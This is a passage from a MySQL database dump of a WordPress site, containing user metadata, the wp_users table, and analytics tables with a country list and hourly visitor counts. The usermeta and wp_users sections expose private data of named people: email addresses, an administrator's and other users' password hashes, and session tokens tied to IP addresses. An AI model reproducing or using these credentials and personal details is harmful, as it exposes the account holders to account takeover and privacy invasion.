Daily\";s:12:\"product_slug\";s:12:\"jetpack_scan\";s:11:\"description\";s:0:\"\";s:12:\"product_type\";s:7:\"jetpack\";s:9:\"available\";b:1;s:20:\"billing_product_slug\";s:12:\"jetpack-scan\";s:22:\"is_domain_registration\";b:0;s:12:\"cost_display\";s:7:\"$120.00\";s:21:\"combined_cost_display\";s:7:\"$120.00\";s:4:\"cost\";i:120;s:18:\"cost_smallest_unit\";i:12000;s:13:\"currency_code\";s:3:\"USD\";s:15:\"price_tier_list\";a:0:{}s:25:\"price_tier_usage_quantity\";N;s:12:\"product_term\";s:4:\"year\";s:11:\"price_tiers\";a:0:{}s:15:\"price_tier_slug\";s:0:\"\";}'),(859,42,'wpcom_user_id','157676901'),(860,42,'wpcom_user_data','O:8:\"stdClass\":10:{s:2:\"ID\";i:157676901;s:5:\"login\";s:15:\"elvinasamuels61\";s:5:\"email\";s:25:\"elvinasamuels61@gmail.com\";s:3:\"url\";s:36:\"http://elvinasamuels61.wordpress.com\";s:10:\"first_name\";s:6:\"Elvina\";s:9:\"last_name\";s:7:\"Samuels\";s:12:\"display_name\";s:14:\"Elvina Samuels\";s:11:\"description\";s:0:\"\";s:16:\"two_step_enabled\";b:0;s:16:\"external_user_id\";i:42;}'),(861,42,'elementor_admin_notices','a:1:{s:20:\"experiment_promotion\";s:4:\"true\";}'),(896,39,'ecs_instalation','1716821273'),(897,39,'ecs_notification_verification','2024-05-27'),(898,38,'wp_persisted_preferences','a:3:{s:14:\"core/edit-post\";a:1:{s:12:\"welcomeGuide\";b:0;}s:9:\"_modified\";s:24:\"2026-06-17T17:40:17.765Z\";s:4:\"core\";a:2:{s:10:\"openPanels\";a:5:{i:0;s:11:\"post-status\";i:1;s:14:\"featured-image\";i:2;s:23:\"taxonomy-panel-category\";i:3;s:16:\"discussion-panel\";i:4;s:23:\"taxonomy-panel-post_tag\";}s:26:\"isComplementaryAreaVisible\";b:1;}}'),(907,38,'meta-box-order_document','a:3:{s:4:\"side\";s:111:\"submitdiv,resource_categorydiv,resource_tagdiv,pageparentdiv,resource_typediv,cas-content-sidebars,postimagediv\";s:6:\"normal\";s:29:\"slugdiv,pods-meta-more-fields\";s:8:\"advanced\";s:0:\"\";}'),(908,38,'screen_layout_document','2'),(910,1,'session_tokens','a:1:{s:64:\"2b24bac817e762b101f901825565fc2d66f919b977d32ec3394006ccb46b283b\";a:4:{s:10:\"expiration\";i:1771248402;s:2:\"ip\";s:13:\"14.97.137.114\";s:2:\"ua\";s:111:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/144.0.0.0 Safari/537.36\";s:5:\"login\";i:1771075602;}}'),(913,38,'session_tokens','a:1:{s:64:\"34ff25c03489c5b72e02034174a54f5a213bc5908c6aaa41005fe5229452b37b\";a:4:{s:10:\"expiration\";i:1781885639;s:2:\"ip\";s:13:\"41.191.107.58\";s:2:\"ua\";s:117:\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/149.0.0.0 Safari/537.36\";s:5:\"login\";i:1781712839;}}');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_users`
--

DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
  `ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `user_login` varchar(60) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_pass` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_nicename` varchar(50) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_email` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_url` varchar(100) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `user_activation_key` varchar(255) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `user_status` int(11) NOT NULL DEFAULT '0',
  `display_name` varchar(250) COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  PRIMARY KEY (`ID`),
  KEY `user_login_key` (`user_login`),
  KEY `user_nicename` (`user_nicename`),
  KEY `user_email` (`user_email`)
) ENGINE=MyISAM AUTO_INCREMENT=46 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_users`
--

LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin_2','$P$Bl.sDaX.VP3M1oKD.EHhnmFxznN15X0','admin_2','contact@ekmsliberia.info','','2019-11-08 04:43:58','',0,'Administrator'),(43,'webmaster','$wp$2y$10$A/CnCtRrQbFiejWHI2utnOl5on58jah5.jf2PkMdr1i8F6K/KWAHO','webmaster','tasaykpa@gmail.com','','2021-08-18 15:12:53','',0,'Trokon Saykpa'),(42,'esamuels','$P$BNnm/09CXjmTdSud0D3N/zdEfaWVb.1','esamuels','esamuels@ekmsliberia.info','','2020-08-22 07:53:47','',0,'Elvina Samuels'),(38,'ujayvah','$wp$2y$10$v4rK50Tw.uLm0x5./EITl.leEU9/Z/h54OOtoXZp.FLw.OHMe.7kW','ujayvah','vahujay.mts@gmail.com','','2019-11-20 15:04:36','',0,'Ujay Vah');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wpfm_backup`
--

DROP TABLE IF EXISTS `wp_wpfm_backup`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wpfm_backup` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `backup_name` text COLLATE utf8mb4_unicode_ci,
  `backup_date` text COLLATE utf8mb4_unicode_ci,
  PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wpfm_backup`
--

LOCK TABLES `wp_wpfm_backup` WRITE;
/*!40000 ALTER TABLE `wp_wpfm_backup` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_wpfm_backup` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Temporary table structure for view `wp_wsm_bounceVisits`
--

DROP TABLE IF EXISTS `wp_wsm_bounceVisits`;
/*!50001 DROP VIEW IF EXISTS `wp_wsm_bounceVisits`*/;
SET @saved_cs_client     = @@character_set_client;
SET character_set_client = utf8;
/*!50001 CREATE VIEW `wp_wsm_bounceVisits` AS SELECT 
 1 AS `visitId`,
 1 AS `visitLastActionTime`*/;
SET character_set_client = @saved_cs_client;

--
-- Table structure for table `wp_wsm_browsers`
--

DROP TABLE IF EXISTS `wp_wsm_browsers`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_browsers` (
  `id` tinyint(2) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) DEFAULT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=15 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_browsers`
--

LOCK TABLES `wp_wsm_browsers` WRITE;
/*!40000 ALTER TABLE `wp_wsm_browsers` DISABLE KEYS */;
INSERT INTO `wp_wsm_browsers` VALUES (1,'Mozilla Firefox'),(2,'Google Chrome'),(3,'Opera'),(4,'Safari'),(5,'Internet Explorer'),(6,'Micorsoft Edge'),(7,'Torch'),(8,'Maxthon'),(9,'SeaMonkey'),(10,'Avant Browser'),(11,'Deepnet Explorer'),(12,'UE Browser'),(13,'BingPreview'),(14,'http://www.baidu.com/search');
/*!40000 ALTER TABLE `wp_wsm_browsers` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_countries`
--

DROP TABLE IF EXISTS `wp_wsm_countries`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_countries` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL,
  `alpha2Code` varchar(2) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL,
  `alpha3Code` varchar(3) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL,
  `numericCode` smallint(6) NOT NULL,
  PRIMARY KEY (`id`),
  UNIQUE KEY `id` (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=250 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_countries`
--

LOCK TABLES `wp_wsm_countries` WRITE;
/*!40000 ALTER TABLE `wp_wsm_countries` DISABLE KEYS */;
INSERT INTO `wp_wsm_countries` VALUES (1,'Afghanistan','AF','AFG',4),(2,'&Aring;land Islands','AX','ALA',248),(3,'Albania','AL','ALB',8),(4,'Algeria','DZ','DZA',12),(5,'American Samoa','AS','ASM',16),(6,'Andorra','AD','AND',20),(7,'Angola','AO','AGO',24),(8,'Anguilla','AI','AIA',660),(9,'Antarctica','AQ','ATA',10),(10,'Antigua and Barbuda','AG','ATG',28),(11,'Argentina','AR','ARG',32),(12,'Armenia','AM','ARM',51),(13,'Aruba','AW','ABW',533),(14,'Australia','AU','AUS',36),(15,'Austria','AT','AUT',40),(16,'Azerbaijan','AZ','AZE',31),(17,'Bahamas','BS','BHS',44),(18,'Bahrain','BH','BHR',48),(19,'Bangladesh','BD','BGD',50),(20,'Barbados','BB','BRB',52),(21,'Belarus','BY','BLR',112),(22,'Belgium','BE','BEL',56),(23,'Belize','BZ','BLZ',84),(24,'Benin','BJ','BEN',204),(25,'Bermuda','BM','BMU',60),(26,'Bhutan','BT','BTN',64),(27,'Bolivia, Plurinational State of','BO','BOL',68),(28,'Bonaire, Sint Eustatius and Saba','BQ','BES',535),(29,'Bosnia and Herzegovina','BA','BIH',70),(30,'Botswana','BW','BWA',72),(31,'Bouvet Island','BV','BVT',74),(32,'Brazil','BR','BRA',76),(33,'British Indian Ocean Territory','IO','IOT',86),(34,'Brunei Darussalam','BN','BRN',96),(35,'Bulgaria','BG','BGR',100),(36,'Burkina Faso','BF','BFA',854),(37,'Burundi','BI','BDI',108),(38,'Cambodia','KH','KHM',116),(39,'Cameroon','CM','CMR',120),(40,'Canada','CA','CAN',124),(41,'Cape Verde','CV','CPV',132),(42,'Cayman Islands','KY','CYM',136),(43,'Central African Republic','CF','CAF',140),(44,'Chad','TD','TCD',148),(45,'Chile','CL','CHL',152),(46,'China','CN','CHN',156),(47,'Christmas Island','CX','CXR',162),(48,'Cocos (Keeling) Islands','CC','CCK',166),(49,'Colombia','CO','COL',170),(50,'Comoros','KM','COM',174),(51,'Congo','CG','COG',178),(52,'Congo, the Democratic Republic of the','CD','COD',180),(53,'Cook Islands','CK','COK',184),(54,'Costa Rica','CR','CRI',188),(55,'C&ocirc;te d\'\'Ivoire','CI','CIV',384),(56,'Croatia','HR','HRV',191),(57,'Cuba','CU','CUB',192),(58,'Cura','CW','CUW',531),(59,'Cyprus','CY','CYP',196),(60,'Czech Republic','CZ','CZE',203),(61,'Denmark','DK','DNK',208),(62,'Djibouti','DJ','DJI',262),(63,'Dominica','DM','DMA',212),(64,'Dominican Republic','DO','DOM',214),(65,'Ecuador','EC','ECU',218),(66,'Egypt','EG','EGY',818),(67,'El Salvador','SV','SLV',222),(68,'Equatorial Guinea','GQ','GNQ',226),(69,'Eritrea','ER','ERI',232),(70,'Estonia','EE','EST',233),(71,'Ethiopia','ET','ETH',231),(72,'Falkland Islands (Malvinas)','FK','FLK',238),(73,'Faroe Islands','FO','FRO',234),(74,'Fiji','FJ','FJI',242),(75,'Finland','FI','FIN',246),(76,'France','FR','FRA',250),(77,'French Guiana','GF','GUF',254),(78,'French Polynesia','PF','PYF',258),(79,'French Southern Territories','TF','ATF',260),(80,'Gabon','GA','GAB',266),(81,'Gambia','GM','GMB',270),(82,'Georgia','GE','GEO',268),(83,'Germany','DE','DEU',276),(84,'Ghana','GH','GHA',288),(85,'Gibraltar','GI','GIB',292),(86,'Greece','GR','GRC',300),(87,'Greenland','GL','GRL',304),(88,'Grenada','GD','GRD',308),(89,'Guadeloupe','GP','GLP',312),(90,'Guam','GU','GUM',316),(91,'Guatemala','GT','GTM',320),(92,'Guernsey','GG','GGY',831),(93,'Guinea','GN','GIN',324),(94,'Guinea-Bissau','GW','GNB',624),(95,'Guyana','GY','GUY',328),(96,'Haiti','HT','HTI',332),(97,'Heard Island and McDonald Islands','HM','HMD',334),(98,'Holy See (Vatican City State)','VA','VAT',336),(99,'Honduras','HN','HND',340),(100,'Hong Kong','HK','HKG',344),(101,'Hungary','HU','HUN',348),(102,'Iceland','IS','ISL',352),(103,'India','IN','IND',356),(104,'Indonesia','ID','IDN',360),(105,'Iran, Islamic Republic of','IR','IRN',364),(106,'Iraq','IQ','IRQ',368),(107,'Ireland','IE','IRL',372),(108,'Isle of Man','IM','IMN',833),(109,'Israel','IL','ISR',376),(110,'Italy','IT','ITA',380),(111,'Jamaica','JM','JAM',388),(112,'Japan','JP','JPN',392),(113,'Jersey','JE','JEY',832),(114,'Jordan','JO','JOR',400),(115,'Kazakhstan','KZ','KAZ',398),(116,'Kenya','KE','KEN',404),(117,'Kiribati','KI','KIR',296),(118,'Korea, Democratic People\'s Republic of','KP','PRK',408),(119,'Korea, Republic of','KR','KOR',410),(120,'Kuwait','KW','KWT',414),(121,'Kyrgyzstan','KG','KGZ',417),(122,'Lao People\'s Democratic Republic','LA','LAO',418),(123,'Latvia','LV','LVA',428),(124,'Lebanon','LB','LBN',422),(125,'Lesotho','LS','LSO',426),(126,'Liberia','LR','LBR',430),(127,'Libya','LY','LBY',434),(128,'Liechtenstein','LI','LIE',438),(129,'Lithuania','LT','LTU',440),(130,'Luxembourg','LU','LUX',442),(131,'Macao','MO','MAC',446),(132,'Macedonia, the former Yugoslav Republic of','MK','MKD',807),(133,'Madagascar','MG','MDG',450),(134,'Malawi','MW','MWI',454),(135,'Malaysia','MY','MYS',458),(136,'Maldives','MV','MDV',462),(137,'Mali','ML','MLI',466),(138,'Malta','MT','MLT',470),(139,'Marshall Islands','MH','MHL',584),(140,'Martinique','MQ','MTQ',474),(141,'Mauritania','MR','MRT',478),(142,'Mauritius','MU','MUS',480),(143,'Mayotte','YT','MYT',175),(144,'Mexico','MX','MEX',484),(145,'Micronesia, Federated States of','FM','FSM',583),(146,'Moldova, Republic of','MD','MDA',498),(147,'Monaco','MC','MCO',492),(148,'Mongolia','MN','MNG',496),(149,'Montenegro','ME','MNE',499),(150,'Montserrat','MS','MSR',500),(151,'Morocco','MA','MAR',504),(152,'Mozambique','MZ','MOZ',508),(153,'Myanmar','MM','MMR',104),(154,'Namibia','NA','NAM',516),(155,'Nauru','NR','NRU',520),(156,'Nepal','NP','NPL',524),(157,'Netherlands','NL','NLD',528),(158,'New Caledonia','NC','NCL',540),(159,'New Zealand','NZ','NZL',554),(160,'Nicaragua','NI','NIC',558),(161,'Niger','NE','NER',562),(162,'Nigeria','NG','NGA',566),(163,'Niue','NU','NIU',570),(164,'Norfolk Island','NF','NFK',574),(165,'Northern Mariana Islands','MP','MNP',580),(166,'Norway','NO','NOR',578),(167,'Oman','OM','OMN',512),(168,'Pakistan','PK','PAK',586),(169,'Palau','PW','PLW',585),(170,'Palestine, State of','PS','PSE',275),(171,'Panama','PA','PAN',591),(172,'Papua New Guinea','PG','PNG',598),(173,'Paraguay','PY','PRY',600),(174,'Peru','PE','PER',604),(175,'Philippines','PH','PHL',608),(176,'Pitcairn','PN','PCN',612),(177,'Poland','PL','POL',616),(178,'Portugal','PT','PRT',620),(179,'Puerto Rico','PR','PRI',630),(180,'Qatar','QA','QAT',634),(181,'R&eacute;union','RE','REU',638),(182,'Romania','RO','ROU',642),(183,'Russian Federation','RU','RUS',643),(184,'Rwanda','RW','RWA',646),(185,'Saint Barth&eacute;lemy','BL','BLM',652),(186,'Saint Helena, Ascension and Tristan da Cunha','SH','SHN',654),(187,'Saint Kitts and Nevis','KN','KNA',659),(188,'Saint Lucia','LC','LCA',662),(189,'Saint Martin (French part)','MF','MAF',663),(190,'Saint Pierre and Miquelon','PM','SPM',666),(191,'Saint Vincent and the Grenadines','VC','VCT',670),(192,'Samoa','WS','WSM',882),(193,'San Marino','SM','SMR',674),(194,'Sao Tome and Principe','ST','STP',678),(195,'Saudi Arabia','SA','SAU',682),(196,'Senegal','SN','SEN',686),(197,'Serbia','RS','SRB',688),(198,'Seychelles','SC','SYC',690),(199,'Sierra Leone','SL','SLE',694),(200,'Singapore','SG','SGP',702),(201,'Sint Maarten (Dutch part)','SX','SXM',534),(202,'Slovakia','SK','SVK',703),(203,'Slovenia','SI','SVN',705),(204,'Solomon Islands','SB','SLB',90),(205,'Somalia','SO','SOM',706),(206,'South Africa','ZA','ZAF',710),(207,'South Georgia and the South Sandwich Islands','GS','SGS',239),(208,'South Sudan','SS','SSD',728),(209,'Spain','ES','ESP',724),(210,'Sri Lanka','LK','LKA',144),(211,'Sudan','SD','SDN',729),(212,'Suriname','SR','SUR',740),(213,'Svalbard and Jan Mayen','SJ','SJM',744),(214,'Swaziland','SZ','SWZ',748),(215,'Sweden','SE','SWE',752),(216,'Switzerland','CH','CHE',756),(217,'Syrian Arab Republic','SY','SYR',760),(218,'Taiwan, Province of China','TW','TWN',158),(219,'Tajikistan','TJ','TJK',762),(220,'Tanzania, United Republic of','TZ','TZA',834),(221,'Thailand','TH','THA',764),(222,'Timor-Leste','TL','TLS',626),(223,'Togo','TG','TGO',768),(224,'Tokelau','TK','TKL',772),(225,'Tonga','TO','TON',776),(226,'Trinidad and Tobago','TT','TTO',780),(227,'Tunisia','TN','TUN',788),(228,'Turkey','TR','TUR',792),(229,'Turkmenistan','TM','TKM',795),(230,'Turks and Caicos Islands','TC','TCA',796),(231,'Tuvalu','TV','TUV',798),(232,'Uganda','UG','UGA',800),(233,'Ukraine','UA','UKR',804),(234,'United Arab Emirates','AE','ARE',784),(235,'United Kingdom','GB','GBR',826),(236,'United States','US','USA',840),(237,'United States Minor Outlying Islands','UM','UMI',581),(238,'Uruguay','UY','URY',858),(239,'Uzbekistan','UZ','UZB',860),(240,'Vanuatu','VU','VUT',548),(241,'Venezuela, Bolivarian Republic of','VE','VEN',862),(242,'Viet Nam','VN','VNM',704),(243,'Virgin Islands, British','VG','VGB',92),(244,'Virgin Islands, U.S.','VI','VIR',850),(245,'Wallis and Futuna','WF','WLF',876),(246,'Western Sahara','EH','ESH',732),(247,'Yemen','YE','YEM',887),(248,'Zambia','ZM','ZMB',894),(249,'Zimbabwe','ZW','ZWE',716);
/*!40000 ALTER TABLE `wp_wsm_countries` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wsm_dailyHourlyReport`
--

DROP TABLE IF EXISTS `wp_wsm_dailyHourlyReport`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wsm_dailyHourlyReport` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `name` varchar(50) NOT NULL,
  `reportDate` datetime NOT NULL,
  `content` text NOT NULL,
  `timezone` varchar(20) NOT NULL,
  PRIMARY KEY (`id`)
) ENGINE=InnoDB AUTO_INCREMENT=16 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wsm_dailyHourlyReport`
--

LOCK TABLES `wp_wsm_dailyHourlyReport` WRITE;
/*!40000 ALTER TABLE `wp_wsm_dailyHourlyReport` DISABLE KEYS */;
INSERT INTO `wp_wsm_dailyHourlyReport` VALUES (1,'hourWisePageViews','2021-08-12 00:00:00','a:10:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"5\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:9:\"pageViews\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:9:\"pageViews\";s:1:\"7\";}i:4;a:2:{s:4:\"hour\";s:2:\"17\";s:9:\"pageViews\";s:1:\"6\";}i:5;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"3\";}i:6;a:2:{s:4:\"hour\";s:2:\"19\";s:9:\"pageViews\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:2:\"20\";s:9:\"pageViews\";s:1:\"8\";}i:8;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"5\";}i:9;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"2\";}}','+01:00'),(2,'hourWiseVisitors','2021-08-12 00:00:00','a:10:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"3\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"5\";}i:4;a:2:{s:4:\"hour\";s:2:\"17\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"2\";}i:7;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"4\";}i:9;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(3,'hourWiseFirstVisitors','2021-08-12 00:00:00','a:9:{i:0;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"1\";}i:1;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"5\";}i:2;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"3\";}i:3;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"4\";}i:4;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"19\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:2:\"20\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"22\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(4,'hourWisePageViews','2021-08-13 00:00:00','a:17:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"4\";}i:3;a:2:{s:4:\"hour\";s:1:\"5\";s:9:\"pageViews\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"6\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"7\";s:9:\"pageViews\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:9:\"pageViews\";s:1:\"6\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"8\";}i:8;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:2:\"15\";}i:9;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"9\";}i:11;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:2:\"16\";}i:12;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"7\";}i:13;a:2:{s:4:\"hour\";s:2:\"15\";s:9:\"pageViews\";s:1:\"2\";}i:14;a:2:{s:4:\"hour\";s:2:\"16\";s:9:\"pageViews\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"1\";}i:16;a:2:{s:4:\"hour\";s:2:\"21\";s:9:\"pageViews\";s:1:\"2\";}}','+01:00'),(5,'hourWiseVisitors','2021-08-13 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"2\";}i:5;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"2\";}i:6;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"3\";}i:7;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:8;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:9;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"5\";}i:10;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"4\";}i:11;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:12;a:2:{s:4:\"hour\";s:2:\"15\";s:8:\"visitors\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(6,'hourWiseFirstVisitors','2021-08-13 00:00:00','a:16:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:8:\"visitors\";s:1:\"2\";}i:1;a:2:{s:4:\"hour\";s:1:\"2\";s:8:\"visitors\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"4\";s:8:\"visitors\";s:1:\"2\";}i:3;a:2:{s:4:\"hour\";s:1:\"5\";s:8:\"visitors\";s:1:\"1\";}i:4;a:2:{s:4:\"hour\";s:1:\"6\";s:8:\"visitors\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:1:\"7\";s:8:\"visitors\";s:1:\"1\";}i:6;a:2:{s:4:\"hour\";s:1:\"8\";s:8:\"visitors\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:1:\"9\";s:8:\"visitors\";s:1:\"4\";}i:8;a:2:{s:4:\"hour\";s:2:\"10\";s:8:\"visitors\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"11\";s:8:\"visitors\";s:1:\"1\";}i:10;a:2:{s:4:\"hour\";s:2:\"12\";s:8:\"visitors\";s:1:\"6\";}i:11;a:2:{s:4:\"hour\";s:2:\"13\";s:8:\"visitors\";s:1:\"3\";}i:12;a:2:{s:4:\"hour\";s:2:\"14\";s:8:\"visitors\";s:1:\"2\";}i:13;a:2:{s:4:\"hour\";s:2:\"16\";s:8:\"visitors\";s:1:\"1\";}i:14;a:2:{s:4:\"hour\";s:2:\"18\";s:8:\"visitors\";s:1:\"1\";}i:15;a:2:{s:4:\"hour\";s:2:\"21\";s:8:\"visitors\";s:1:\"2\";}}','+01:00'),(7,'hourWisePageViews','2021-08-14 00:00:00','a:14:{i:0;a:2:{s:4:\"hour\";s:1:\"0\";s:9:\"pageViews\";s:1:\"8\";}i:1;a:2:{s:4:\"hour\";s:1:\"1\";s:9:\"pageViews\";s:1:\"1\";}i:2;a:2:{s:4:\"hour\";s:1:\"2\";s:9:\"pageViews\";s:1:\"1\";}i:3;a:2:{s:4:\"hour\";s:1:\"4\";s:9:\"pageViews\";s:1:\"2\";}i:4;a:2:{s:4:\"hour\";s:1:\"9\";s:9:\"pageViews\";s:1:\"1\";}i:5;a:2:{s:4:\"hour\";s:2:\"10\";s:9:\"pageViews\";s:1:\"5\";}i:6;a:2:{s:4:\"hour\";s:2:\"11\";s:9:\"pageViews\";s:1:\"1\";}i:7;a:2:{s:4:\"hour\";s:2:\"12\";s:9:\"pageViews\";s:1:\"1\";}i:8;a:2:{s:4:\"hour\";s:2:\"13\";s:9:\"pageViews\";s:1:\"2\";}i:9;a:2:{s:4:\"hour\";s:2:\"14\";s:9:\"pageViews\";s:1:\"3\";}i:10;a:2:{s:4:\"hour\";s:2:\"17\";s:9:\"pageViews\";s:1:\"4\";}i:11;a:2:{s:4:\"hour\";s:2:\"18\";s:9:\"pageViews\";s:1:\"1\";}i:12;a:2:{s:4:\"hour\";s:2:\"22\";s:9:\"pageViews\";s:1:\"1\";}i:13;a:2:{s:4:\"hour\";s:2:\"23\";s:9:\"pageViews\";s:1:\"4\";}}','+01:00'),(8,'hourWiseVisitors','2021-0